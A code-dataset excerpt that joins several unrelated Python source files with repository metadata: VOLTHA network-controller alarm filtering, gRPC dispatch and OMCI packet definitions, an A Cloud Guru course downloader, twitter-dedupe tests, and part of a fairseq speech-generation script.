changed_ts=changed_ts,
context=context
)
def filter_alarm(self, device_id, alarm_event):
alarm_filters = self.root_proxy.get('/alarm_filters')
rule_values = {
'id': alarm_event.id,
'type': AlarmEventType.AlarmEventType.Name(alarm_event.type),
'category': AlarmEventCategory.AlarmEventCategory.Name(
alarm_event.category),
'severity': AlarmEventSeverity.AlarmEventSeverity.Name(
alarm_event.severity),
'resource_id': alarm_event.resource_id,
'device_id': device_id
}
for alarm_filter in alarm_filters:
if alarm_filter.rules:
exclude = True
for rule in alarm_filter.rules:
self.log.debug("compare-alarm-event",
key=AlarmFilterRuleKey.AlarmFilterRuleKey.Name(
rule.key),
actual=rule_values[
AlarmFilterRuleKey.AlarmFilterRuleKey.Name(
rule.key)].lower(),
expected=rule.value.lower())
exclude = exclude and \
(rule_values[
AlarmFilterRuleKey.AlarmFilterRuleKey.Name(
rule.key)].lower() == rule.value.lower())
if not exclude:
break
if exclude:
self.log.info("filtered-alarm-event", alarm=alarm_event)
return True
return False
def submit_alarm(self, device_id, alarm_event_msg):
try:
assert isinstance(alarm_event_msg, AlarmEvent)
if not self.filter_alarm(device_id, alarm_event_msg):
self.event_bus.publish('alarms', alarm_event_msg)
except Exception as e:
self.log.exception('failed-alarm-submission',
type=type(alarm_event_msg))
# ~~~~~~~~~~~~~~~~~~~ Handle ONU detect ~~~~~~~~~~~~~~~~~~~~~
def _gen_onu_detect_proxy_address_topic(self, device_id):
"""Generate unique topic name specific to this device id for onu detect"""
topic = str('onu_detect:{}'.format(device_id))
return topic
def register_for_onu_detect_state(self, device_id):
topic = self._gen_onu_detect_proxy_address_topic(device_id)
self._onu_detect_event_subscriptions[topic] = self.event_bus.subscribe(
topic,
lambda t, m: self._forward_onu_detect_state(device_id, m))
def unregister_for_onu_detect_state(self, device_id):
topic = self._gen_onu_detect_proxy_address_topic(device_id)
self.event_bus.unsubscribe(self._onu_detect_event_subscriptions[topic])
del self._onu_detect_event_subscriptions[topic]
def _forward_onu_detect_state(self, device_id, state):
self.adapter.receive_onu_detect_state(device_id, state)
def forward_onu_detect_state(self, device_id, state):
topic = self._gen_onu_detect_proxy_address_topic(device_id)
self.event_bus.publish(topic, state)
```
#### File: voltha/core/dispatcher.py
```python
import structlog
from twisted.internet.defer import inlineCallbacks, returnValue
from voltha.protos.voltha_pb2 import VolthaLocalServiceStub
from voltha.registry import registry
from twisted.internet import reactor
import grpc
from grpc import StatusCode
from grpc._channel import _Rendezvous
from common.utils.id_generation import get_core_id_from_device_id, \
is_broadcast_core_id
log = structlog.get_logger()
class DispatchError(object):
def __init__(self, error_code):
self.error_code = error_code
class Dispatcher(object):
def __init__(self, core, instance_id, core_store_id, grpc_port):
self.core = core
self.instance_id = instance_id
self.core_store_id = core_store_id
self.grpc_port = grpc_port
self.local_handler = None
self.peers_map = dict()
self.grpc_conn_map = {}
def start(self):
log.debug('starting')
self.local_handler = self.core.get_local_handler()
reactor.callLater(0, self._start_tracking_peers)
log.info('started')
return self
def stop(self):
log.debug('stopping')
log.info('stopped')
@inlineCallbacks
def dispatch(self,
method_name,
request,
context,
core_id=None,
id=None,
broadcast=False):
"""
Called whenever a global request is received from the NBI. The
request will be dispatch as follows:
1) to a specific voltha Instance if the core_id is specified
2) to the local Voltha Instance if the request specifies an ID that
matches the core id of the local Voltha instance
3) to a remote Voltha Instance if the request specifies an ID that
matches the core id of that voltha instance
4) to all Voltha Instances if it's a broadcast request,
e.g. getDevices, i.e. broadcast=True. The id may or may not be
None. In this case, the results will be returned as a list of
responses back to the global handler
5) to the local voltha instance if id=None and broadcast=False.
This occurs in cases where any Voltha instance will return the same
output, e.g. getAdapters()
:param method_name: rpc name
:param id: the id in the request, if present.
:param request: the input parameters
:param context: grpc context
:return: the response of that dispatching request
"""
log.info('start',
_method_name=method_name,
id=id,
request=request)
core_id_from_request_id = None
if id:
try:
core_id_from_request_id = get_core_id_from_device_id(id)
except Exception, e:
log.warning('invalid-id', request=request, id=id)
returnValue(DispatchError(StatusCode.NOT_FOUND))
try:
# Broadcast request if set
if broadcast:
# broadcast to all instances (including locally)
res = yield self._broadcast_request(method_name,
request,
context)
returnValue(res)
# Local Dispatch
elif (core_id and core_id == self.core_store_id) or (not id) or \
(core_id_from_request_id and (
(core_id_from_request_id == self.core_store_id) or
(is_broadcast_core_id(id))
)
):
returnValue(self._local_dispatch(self.core_store_id,
method_name,
request,
context))
# Peer Dispatch
elif core_id_from_request_id:
res = yield self._dispatch_to_peer(core_id_from_request_id,
method_name,
request,
context)
returnValue(res)
else:
log.warning('invalid-request', request=request, id=id,
core_id=core_id, broadcast=broadcast)
returnValue(DispatchError(StatusCode.INVALID_ARGUMENT))
except Exception as e:
log.exception('remote-dispatch-exception', e=e)
returnValue(DispatchError(StatusCode.UNKNOWN))
def get_core_id_from_instance_id(self, instance_id):
"""
:param instance_id: instance name
:return: core id of that instance
"""
if instance_id == self.instance_id:
return self.core_store_id
for id, instance in self.peers_map.iteritems():
if instance['id'] == instance_id:
return id
def get_cluster_instances(self):
result = []
result.append(self.instance_id)
for id, instance in self.peers_map.iteritems():
result.append(instance['id'])
return result
def instance_id_by_logical_device_id(self, logical_device_id):
log.warning('temp-mapping-logical-device-id')
# TODO no true dispatchong yet, we blindly map everything to self
return self.instance_id
def instance_id_by_device_id(self, device_id):
log.warning('temp-mapping-logical-device-id')
# TODO no true dispatchong yet, we blindly map everything to self
return self.instance_id
@inlineCallbacks
def _broadcast_request(self, method_name, request, context):
# First get local result
result = self._local_dispatch(self.core_store_id,
method_name,
request,
context)
# Then get peers results
log.info('maps', peers=self.peers_map, grpc=self.grpc_conn_map)
current_responses = [result]
for core_id in self.peers_map:
if core_id == self.core_store_id:
continue # already processed
# As a safeguard, check whether the core_id is in the grpc map
if core_id not in self.grpc_conn_map:
log.warn('no-grpc-peer-connection', core=core_id)
elif self.peers_map[core_id] and self.grpc_conn_map[core_id]:
res = yield self._dispatch_to_peer(core_id,
method_name,
request,
context)
if isinstance(res, DispatchError):
log.warning('ignoring-peer',
core_id=core_id,
error_code=res.error_code)
elif res not in current_responses:
result.MergeFrom(res)
current_responses.append(res)
returnValue(result)
def _local_dispatch(self, core_id, method_name, request, context):
log.debug('local-dispatch', core_id=core_id)
method = getattr(self.local_handler, method_name)
res = method(request, context=context)
log.debug('local-dispatch-result', res=res, context=context)
return res
@inlineCallbacks
def _start_tracking_peers(self):
try:
while True:
peers_map = yield registry('coordinator').recv_peers_map()
log.info('peers-map-changed', peers_map=peers_map)
yield self.update_grpc_client_map(peers_map)
self.peers_map = peers_map
except Exception, e:
log.exception('exception', e=e)
@inlineCallbacks
def update_grpc_client_map(self, peers_map):
try:
# 1. Get the list of connection to open and to close
to_open = dict()
to_close = set()
for id, instance in peers_map.iteritems():
# Check for no change
if id in self.peers_map and self.peers_map[id] == instance:
continue
if id not in self.peers_map:
if instance:
to_open[id] = instance['host']
elif instance:
to_open[id] = instance['host']
if self.peers_map[id]:
to_close.add(id)
else:
if self.peers_map[id]:
to_close.add(id)
# Close connections that are no longer referenced
old_ids = set(self.peers_map.keys()) - set(peers_map.keys())
for id in old_ids:
if self.peers_map[id]:
to_close.add(id)
# 2. Refresh the grpc connections
yield self._refresh_grpc_connections(to_open, to_close)
except Exception, e:
log.exception('exception', e=e)
@inlineCallbacks
def _refresh_grpc_connections(self, to_open, to_close):
try:
log.info('grpc-channel-refresh', to_open=to_open,
to_close=to_close)
# Close the unused connection
for id in to_close:
if self.grpc_conn_map[id]:
# clear connection
self._disconnect_from_peer(id)
# Open the new connections
for id, host in to_open.iteritems():
if id in self.grpc_conn_map and self.grpc_conn_map[id]:
# clear connection
self._disconnect_from_peer(id)
if host:
self.grpc_conn_map[id] = \
yield self._connect_to_peer(host, self.grpc_port)
except Exception, e:
log.exception('exception', e=e)
@inlineCallbacks
def _connect_to_peer(self, host, port):
try:
channel = yield grpc.insecure_channel('{}:{}'.format(host, port))
log.info('grpc-channel-created-with-peer', peer=host)
returnValue(channel)
except Exception, e:
log.exception('exception', e=e)
def _disconnect_from_peer(self, peer_id):
try:
if self.grpc_conn_map[peer_id]:
# Let garbage collection clear the connect - no API exist to
# close the connection
# yield self.grpc_conn_map[peer_id].close()
self.grpc_conn_map[peer_id] = None
log.info('grpc-channel-closed-with-peer', peer_id=peer_id)
except Exception, e:
log.exception('exception', e=e)
finally:
self.grpc_conn_map.pop(peer_id)
@inlineCallbacks
def _reconnect_to_peer(self, peer_id):
try:
# First disconnect
yield self._disconnect_from_peer(peer_id)
# Then reconnect
peer_instance = self.peers_map.get(peer_id, None)
if peer_instance:
self.grpc_conn_map[peer_id] = \
yield self._connect_to_peer(peer_instance['host'],
self.grpc_port)
log.info('reconnected-to-peer', peer_id=peer_id)
returnValue(True)
else:
log.info('peer-unavailable', peer_id=peer_id)
except Exception, e:
log.exception('exception', e=e)
returnValue(False)
@inlineCallbacks
def _dispatch_to_peer(self,
core_id,
method_name,
request,
context,
retry=0):
"""
Invoke a gRPC call to the remote server and return the response.
:param core_id: The voltha instance where this request needs to be sent
:param method_name: The method name inside the service stub
:param request: The request protobuf message
:param context: grprc context
:param retry: on failure, the number of times to retry.
:return: The response as a protobuf message
"""
log.debug('peer-dispatch',
core_id=core_id,
_method_name=method_name,
request=request)
if core_id not in self.peers_map or not self.peers_map[core_id]:
log.exception('non-existent-core-id', core_id=core_id,
peers_map=self.peers_map)
return
try:
# Always request from the local service when making request to peer
# Add a long timeout of 15 seconds to balance between:
# (1) a query for large amount of data from a peer
# (2) an error where the peer is not responding and the
# request keeps waiting without getting a grpc
# rendez-vous exception.
stub = VolthaLocalServiceStub
method = getattr(stub(self.grpc_conn_map[core_id]), method_name)
response, rendezvous = yield method.with_call(request,
timeout=15,
metadata=context.invocation_metadata())
log.debug('peer-response',
core_id=core_id,
response=response,
rendezvous_metadata=rendezvous.trailing_metadata())
# TODO: Should we return the metadata as well
returnValue(response)
except grpc._channel._Rendezvous, e:
code = e.code()
if code == grpc.StatusCode.UNAVAILABLE:
# Try to reconnect
status = yield self._reconnect_to_peer(core_id)
if status and retry > 0:
response = yield self._dispatch_to_peer(core_id,
method_name,
request,
context,
retry=retry - 1)
returnValue(response)
elif code in (
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.UNAUTHENTICATED,
grpc.StatusCode.PERMISSION_DENIED):
pass # don't log error, these occur naturally
else:
log.exception('error-invoke', e=e)
log.warning('error-from-peer', code=code)
returnValue(DispatchError(code))
```
#### File: extensions/omci/omci_frame.py
```python
from scapy.fields import ByteField, PacketField, IntField
from scapy.fields import ShortField, ConditionalField
from scapy.packet import Packet
from voltha.extensions.omci.omci_defs import FixedLenField
from voltha.extensions.omci.omci_messages import OmciCreate, OmciDelete, \
OmciDeleteResponse, OmciSet, OmciSetResponse, OmciGet, OmciGetResponse, \
OmciGetAllAlarms, OmciGetAllAlarmsResponse, OmciGetAllAlarmsNext, \
OmciMibResetResponse, OmciMibReset, OmciMibUploadNextResponse, \
OmciMibUploadNext, OmciMibUploadResponse, OmciMibUpload, \
OmciGetAllAlarmsNextResponse, OmciAttributeValueChange, \
OmciTestResult, OmciAlarmNotification, \
OmciReboot, OmciRebootResponse
from voltha.extensions.omci.omci_messages import OmciCreateResponse
class OmciFrame(Packet):
name = "OmciFrame"
fields_desc = [
ShortField("transaction_id", 0),
ByteField("message_type", None),
ByteField("omci", 0x0a),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciCreate), align=36),
lambda pkt: pkt.message_type == OmciCreate.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciCreateResponse), align=36),
lambda pkt: pkt.message_type == OmciCreateResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciDelete), align=36),
lambda pkt: pkt.message_type == OmciDelete.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciDeleteResponse), align=36),
lambda pkt: pkt.message_type == OmciDeleteResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciSet), align=36),
lambda pkt: pkt.message_type == OmciSet.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciSetResponse), align=36),
lambda pkt: pkt.message_type == OmciSetResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGet), align=36),
lambda pkt: pkt.message_type == OmciGet.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetResponse), align=36),
lambda pkt: pkt.message_type == OmciGetResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetAllAlarms), align=36),
lambda pkt: pkt.message_type == OmciGetAllAlarms.message_id),
ConditionalField(FixedLenField(
PacketField(
"omci_message", None, OmciGetAllAlarmsResponse), align=36),
lambda pkt:
pkt.message_type == OmciGetAllAlarmsResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciGetAllAlarmsNext), align=36),
lambda pkt: pkt.message_type == OmciGetAllAlarmsNext.message_id),
ConditionalField(FixedLenField(
PacketField(
"omci_message", None, OmciGetAllAlarmsNextResponse), align=36),
lambda pkt:
pkt.message_type == OmciGetAllAlarmsNextResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUpload), align=36),
lambda pkt: pkt.message_type == OmciMibUpload.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUploadResponse), align=36),
lambda pkt: pkt.message_type == OmciMibUploadResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUploadNext), align=36),
lambda pkt:
pkt.message_type == OmciMibUploadNext.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibUploadNextResponse), align=36),
lambda pkt: pkt.message_type == OmciMibUploadNextResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibReset), align=36),
lambda pkt: pkt.message_type == OmciMibReset.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciMibResetResponse), align=36),
lambda pkt: pkt.message_type == OmciMibResetResponse.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciAlarmNotification), align=36),
lambda pkt: pkt.message_type == OmciAlarmNotification.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciAttributeValueChange), align=36),
lambda pkt: pkt.message_type == OmciAttributeValueChange.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciTestResult), align=36),
lambda pkt: pkt.message_type == OmciTestResult.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciReboot), align=36),
lambda pkt: pkt.message_type == OmciReboot.message_id),
ConditionalField(FixedLenField(
PacketField("omci_message", None, OmciRebootResponse), align=36),
lambda pkt: pkt.message_type == OmciRebootResponse.message_id),
# TODO add entries for remaining OMCI message types
IntField("omci_trailer", 0x00000028)
]
# We needed to patch the do_dissect(...) method of Packet, because
# it wiped out already dissected conditional fields with None if they
# referred to the same field name. We marked the only new line of code
# with "Extra condition added".
def do_dissect(self, s):
raw = s
self.raw_packet_cache_fields = {}
for f in self.fields_desc:
if not s:
break
s, fval = f.getfield(self, s)
# We need to track fields with mutable values to discard
# .raw_packet_cache when needed.
if f.islist or f.holds_packets:
self.raw_packet_cache_fields[f.name] = f.do_copy(fval)
# Extra condition added
if fval is not None or f.name not in self.fields:
self.fields[f.name] = fval
assert(raw.endswith(s))
self.raw_packet_cache = raw[:-len(s)] if s else raw
self.explicit = 1
return s
``` |
{
"source": "jonohein/acloud-dl",
"score": 2
} |
#### File: acloud-dl/acloud/_extract.py
```python
import os
import re
import sys
import json
from pprint import pprint
from ._auth import CloudGuruAuth
from ._compat import (
re,
time,
pyver,
encoding,
conn_error,
PUBLIC_GRAPHQL_URL,
PROTECTED_GRAPHQL_URL,
GRAPH_QUERY_COURSES,
GRAPH_QUERY_COURSE_INFO,
GRAPH_QUERY_DOWNLOAD_LINKS,
)
from ._sanitize import (
slugify,
sanitize,
SLUG_OK
)
from ._colorized import *
from ._progress import ProgressBar
class CloudGuru(ProgressBar):
def __init__(self):
self._session = ''
self._cookies = ''
super(CloudGuru, self).__init__()
def _clean(self, text):
ok = re.compile(r'[^\\/:*?"<>|]')
text = "".join(x if ok.match(x) else "_" for x in text)
text = (text.lstrip('0123456789.- ')).rstrip('. ')
return text
def _sanitize(self, unsafetext):
text = slugify(unsafetext, lower=False, spaces=True, ok=SLUG_OK + '()._-')
return self._clean(text)
def _extract_cookie_string(self, raw_cookies):
try:
mobj = re.search(r'(?is)(Authorization:\s*Bearer\s*(?P<access_token>(.+?)))(\"\s|\s)', raw_cookies)
if not mobj:
mobj = re.search(r'(?i)(?:auth0_token=(?P<access_token>[a-zA-Z0-9_.-]+))', raw_cookies)
access_token = mobj.group('access_token')
except:
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Cookies error, Request Headers is required.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Copy Request Headers for single request to a file, while you are logged in.\n")
sys.exit(0)
return {'access_token' : access_token}
def _login(self, cookies=''):
if cookies:
auth = CloudGuruAuth()
self._cookies = self._extract_cookie_string(raw_cookies=cookies)
access_token = self._cookies.get('access_token')
time.sleep(3)
self._session = auth.authenticate(access_token=access_token)
if self._session is not None:
return {'login' : 'successful'}
else:
return {'login' : 'failed'}
def _logout(self):
return self._session.terminate()
def _extract_accessible_courses(self):
try:
response = self._session._post(PUBLIC_GRAPHQL_URL, GRAPH_QUERY_COURSES)
except conn_error as e:
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Connection error : make sure your internet connection is working.\n")
time.sleep(0.8)
sys.exit(0)
else:
courses = response.json().get('data')
if courses:
accessable_courses = courses.get('getAccessibleCourses')
if not accessable_courses:
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Zero accessable courses: no courses found in your accessable courses.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Click 'START THIS COURSE' button to be able to get listed for download..\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "OR follow --> (https://github.com/r0oth3x49/acloud-dl#usage) for proper help..\n")
sys.exit(0)
courses = accessable_courses
for course in courses:
title_clean = self._clean(course.get("title"))
if title_clean:
course.update({"title": title_clean})
return courses
if not courses:
if response.headers.get('x-amzn-ErrorType'):
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Authorization error : it seems your authorization token is expired.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Login again & copy Request headers for a single request to file..\n")
sys.exit(0)
def _extract_assets(self, assets):
_temp = []
if assets and isinstance(assets, list):
for entry in assets:
filename = self._sanitize(entry.get('title'))
url = entry.get('url')
bucket = entry.get('bucket')
key = entry.get('key')
regex = r"(?i)(?:^.*\.(?P<extension>jpg|gif|doc|pdf|zip|docx|ppt|pptx|pptm|txt|py|c|json|md|html|htm|sh|batch|bat))$"
if url:
match = re.match(regex, url)
if match:
extension = match.group('extension')
_temp.append({
'url' : url,
'type' : 'file' if 'github' not in url else 'external_link',
'filename' : filename.rsplit('.', 1)[0] if '.' in filename else filename,
'extension' : extension,
})
if not match:
_temp.append({
'url' : url,
'type' : 'external_link',
'filename' : filename.rsplit('.', 1)[0] if '.' in filename else filename,
'extension' : 'txt',
})
if not url:
query = '''{"bucket": "%s","filePath": "%s"}''' % (bucket, key)
query = GRAPH_QUERY_DOWNLOAD_LINKS % (query)
try:
data = self._session._post(PROTECTED_GRAPHQL_URL, query)
except conn_error as e:
pass
else:
response = data.json().get('data')
if response:
url = response['getRestrictedFiles'].get('urls')[0]
match = re.match(regex, url)
if match:
extension = match.group('extension')
if not match:
extension = filename.rsplit('.', 1)[-1] if '.' in url else 'zip'
_temp.append({
'url' : url,
'type' : 'file',
'filename' : filename.rsplit('.', 1)[0] if '.' in filename else filename,
'extension' : extension,
})
if not response:
if data.headers.get('x-amzn-ErrorType'):
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Authorization error : it seems your authorization token is expired.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Login again & copy Request headers for a single request to file..\n")
sys.exit(0)
return _temp
def _extract_sources(self, sources):
_temp = []
for entry in sources:
resolution = entry.get('description')
if resolution == 'hls' or resolution == 'webm-720p' or resolution == 'web-preset':
continue
if resolution:
source_type = entry.get('type').replace('video/', '')
url = entry.get('key')
bucket = entry.get('bucket')
filesize = entry.get('filesize') or 0
query = '''{"bucket": "%s","filePath": "%s"}''' % (bucket, url)
if resolution == "2160p":
height, width = 2160, 3840
elif resolution == "1440p":
height, width = 1440, 2560
elif resolution == "1080p":
height, width = 1080, 1920
elif resolution == "720p":
height, width = 720, 1280
elif resolution == "480p":
height, width = 480, 854
_temp.append({
'quality' : resolution,
'type' : 'video',
'extension' : source_type,
'path' : url,
'url' : query,
'height' : height,
'width' : width,
'size' : filesize
})
if not resolution:
source_type = entry.get('type').replace('video/', '')
url = entry.get('key')
bucket = entry.get('bucket')
filesize = entry.get('filesize') or 0
query = '''{"bucket": "%s","filePath": "%s"}''' % (bucket, url)
_temp.append({
'quality' : resolution,
'type' : 'video',
'extension' : source_type,
'path' : url,
'url' : query,
'height' : 720,
'width' : 1280,
'size' : filesize
})
return _temp
def _extract_course_information(self, course):
_temp = []
chapters = course.get('chapters')
lectures = [l.get('lectures') for l in chapters]
for lecture in lectures:
sources = [s.get('sources') for s in lecture]
for entry in sources:
query = [e.get('url') for e in entry]
for _str in query:
_temp.append(_str)
files = ','.join(_temp)
query = GRAPH_QUERY_DOWNLOAD_LINKS % (files)
try:
response = self._session._post(PROTECTED_GRAPHQL_URL, query)
except conn_error as e:
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Connection error : make sure your internet connection is working.\n")
time.sleep(0.8)
sys.exit(0)
else:
data = response.json().get('data')
if data:
data = data['getRestrictedFiles'].get('urls')
chapters = course.get('chapters')
for entry in chapters:
lectures = entry.get('lectures')
for entry in lectures:
text = '\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading course information .. "
self._spinner(text)
sources = entry.get('sources')
for entry in sources:
path = entry.get('path')
for url in data:
if path in url:
entry.update({'url' : url})
if not data:
if response.headers.get('x-amzn-ErrorType'):
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Authorization error : it seems your authorization token is expired.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Login again & copy Request headers for a single request to file..\n")
sys.exit(0)
return course
def _extract_lectures(self, lectures):
_temp = []
for entry in lectures:
lecture_title = self._sanitize(entry.get('title'))
lecture_index = int(entry.get('sequence')) + 1
lecture_id = entry.get('componentIdentifier')
content_type = entry['content'].get('type')
lecture = "{0:03d} {1!s}".format(lecture_index, lecture_title)
assets = entry.get('notes')
assets = self._extract_assets(assets)
if content_type == 'video':
sources = entry['content'].get('videosources')
duration = entry['content'].get('duration')
extension = entry['content'].get('type')
sources = self._extract_sources(sources)
subtitle_url = None
for s in sources:
cid = s.get("url")
if cid:
cid = cid.rsplit("/", 1)[-1]
cid = re.search(r"[a-zA-Z0-9]{8}\-[a-zA-Z0-9]{4}\-[a-zA-Z0-9]{4}\-[a-zA-Z0-9]{4}\-[a-zA-Z0-9]{12}", cid)
if cid:
subtitle_url = f"https://acloudguru-subtitles-production.s3.amazonaws.com/{cid.group()}.vtt"
break
if lecture not in _temp:
_temp.append({
'lecture_title' : lecture,
'lecture_id' : lecture_id,
'lecture_index' : lecture_index,
'subtitle_url': subtitle_url,
'duration' : duration,
'extension' : extension,
'sources' : sources,
'assets' : assets,
'sources_count' : len(sources),
'assets_count' : len(assets)
})
return _temp
def _real_extract(self, course_id):
acloud = {}
query = GRAPH_QUERY_COURSE_INFO % (course_id)
try:
response = self._session._post(PUBLIC_GRAPHQL_URL, query)
except conn_error as e:
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Connection error : make sure your internet connection is working.\n")
time.sleep(0.8)
sys.exit(0)
else:
course = response.json().get('data')
if course:
course = course['getCourses'][0]
course_url = course.get('url')
course_title = self._sanitize(course.get('title'))
course_id = course.get('uniqueid')
chapters = course.get('sections')
acloud['course_id'] = course_id
acloud['course_url'] = course_url
acloud['course_title'] = course_title
acloud['total_chapters'] = len(chapters)
acloud['total_lectures'] = sum([len(chapter.get('components', [])) for chapter in chapters])
acloud['chapters'] = []
for entry in chapters:
chapter_title = self._sanitize(entry.get('title'))
chapter_id = entry.get('sectionIdentifier')
chapter_url = entry.get('url')
chapter_index = int(entry.get('sequence')) + 1
lectures_count = len(entry.get('components'))
lectures = entry.get('components')
chapter = "{0:02d} {1!s}".format(chapter_index, chapter_title)
acloud['chapters'].append({
'chapter_title' : chapter,
'chapter_id' : chapter_id,
'chapter_index' : chapter_index,
'lectures_count' : lectures_count,
'chapter_url' : chapter_url,
'lectures' : self._extract_lectures(lectures)
})
acloud = self._extract_course_information(acloud)
if not course:
if response.headers.get('x-amzn-ErrorType'):
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sb + "Authorization error : it seems your authorization token is expired.\n")
sys.stdout.write(fc + sd + "[" + fm + sb + "i" + fc + sd + "] : " + fg + sb + "Login again & copy Request headers for a single request to file..\n")
sys.exit(0)
# with open("course.json", "w") as f:
# json.dump(acloud, f, indent=4)
# f.close()
# exit(0)
return acloud
``` |
{
"source": "jonohill/twitter-dedupe",
"score": 2
} |
#### File: twitterdedupe/tests/test_get_my_unique.py
```python
import pytest
from twitterdedupe.tests.helpers import (
cache,
MockStatus,
MockAPI,
nonetwork_expand_fn
)
@pytest.fixture
def meth():
from twitterdedupe import get_my_unique_statuses
return get_my_unique_statuses
@pytest.fixture
def one_unique_timeline():
timeline = [
MockStatus(
"hitchhikers",
44,
"Most definitely not the question",
"http://www.chrisheisel.com/?wpsrc=fol_tw"
)
]
return timeline
@pytest.fixture
def three_timeline():
timeline = [
MockStatus(
"hitchhikers",
44,
"Most definitely not the question",
"http://www.chrisheisel.com/?wpsrc=fol_tw"
),
MockStatus(
"hitchhikers",
45,
"Most definitely not the question but it is a dupe!",
"http://www.chrisheisel.com/?wpsrc=fol_tw"
),
MockStatus(
"hitchhikers",
46,
"No links this time",
),
MockStatus(
"non-hitchhikers",
3,
"No links this time",
)
]
return timeline
def test_emtpy_timeline(meth, cache, nonetwork_expand_fn):
api = MockAPI("cmheisel", [])
result = meth(api, 1, cache, expand_fn=nonetwork_expand_fn)
assert len(result) == 0
def test_one_unique_timeline(meth, cache,
nonetwork_expand_fn, one_unique_timeline):
api = MockAPI("cmheisel", one_unique_timeline)
result = meth(api, 1, cache, expand_fn=nonetwork_expand_fn)
assert len(result) == 1
def test_three_timeline(meth, cache,
nonetwork_expand_fn, three_timeline):
api = MockAPI("cmheisel", three_timeline)
result = meth(api, 1, cache, expand_fn=nonetwork_expand_fn)
assert len(result) == 3
``` |
{
"source": "jonojace/fairseq",
"score": 2
} |
#### File: examples/speech_audio_corrector/generate_waveform_sac.py
```python
import logging
import matplotlib.pyplot as plt
import numpy as np
from pathlib import Path
import soundfile as sf
import sys
import torch
import torchaudio
import os
from fairseq import checkpoint_utils, options, tasks, utils
from fairseq.logging import progress_bar
from fairseq.tasks.text_to_speech import plot_tts_output
from fairseq.data.audio.text_to_speech_dataset import TextToSpeechDataset
logging.basicConfig()
logging.root.setLevel(logging.INFO)
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def make_parser():
parser = options.get_speech_generation_parser()
parser.add_argument("--dump-features", action="store_true")
parser.add_argument("--dump-waveforms", action="store_true")
parser.add_argument("--dump-attentions", action="store_true")
parser.add_argument("--dump-eos-probs", action="store_true")
parser.add_argument("--dump-plots", action="store_true")
parser.add_argument("--dump-target", action="store_true")
parser.add_argument("--output-sample-rate", default=22050, type=int)
parser.add_argument("--teacher-forcing", action="store_true")
parser.add_argument(
"--audio-format", type=str, default="wav", choices=["wav", "flac"]
)
parser.add_argument(
"--txt-file", type=str, default="",
help="path to txt file of utterances to generate."
)
parser.add_argument("--speechreps-add-mask-tokens", action="store_true")
parser.add_argument("--add-count-to-filename", action="store_true")
parser.add_argument("--use-external-speechreps", action="store_true",
help="Use this flag if you want to use speechreps from the external dataset to do inference.")
return parser
def sac_friendly_text(words_and_speechreps, incl_codes=False,
upper=False, wrap_speechreps_word=True, delimiter=" "):
"""
given
(how, None)
(you, None)
(doing, HUB2 HUB35...)
generate a text of following format
"how are <you-2,35,35,33>"
"""
rv = []
for word, speechreps in words_and_speechreps:
if speechreps is None:
rv.append(word)
else:
s = f"{word.upper() if upper else word}"
if incl_codes:
raise NotImplementedError # finish this, this currently breaks soundfile as soundfile can't deal with
# writing such long filenames to disk
codes_str = "-".join(str(sr) for sr in speechreps)
s += f"-{codes_str}"
if wrap_speechreps_word:
s = f"<{s}>"
rv.append(s)
return delimiter.join(rv)
def strip_pointy_brackets(s):
return "".join(c for c in s if c not in ["<", ">"])
def postprocess_results(
dataset: TextToSpeechDataset, sample, hypos, resample_fn, dump_target, sort_by_text=True
):
def to_np(x):
return None if x is None else x.detach().cpu().numpy()
if sample["id"] is not None:
sample_ids = [dataset.ids[i] for i in sample["id"].tolist()]
else:
sample_ids = [None for _ in hypos]
texts = sample["raw_texts"]
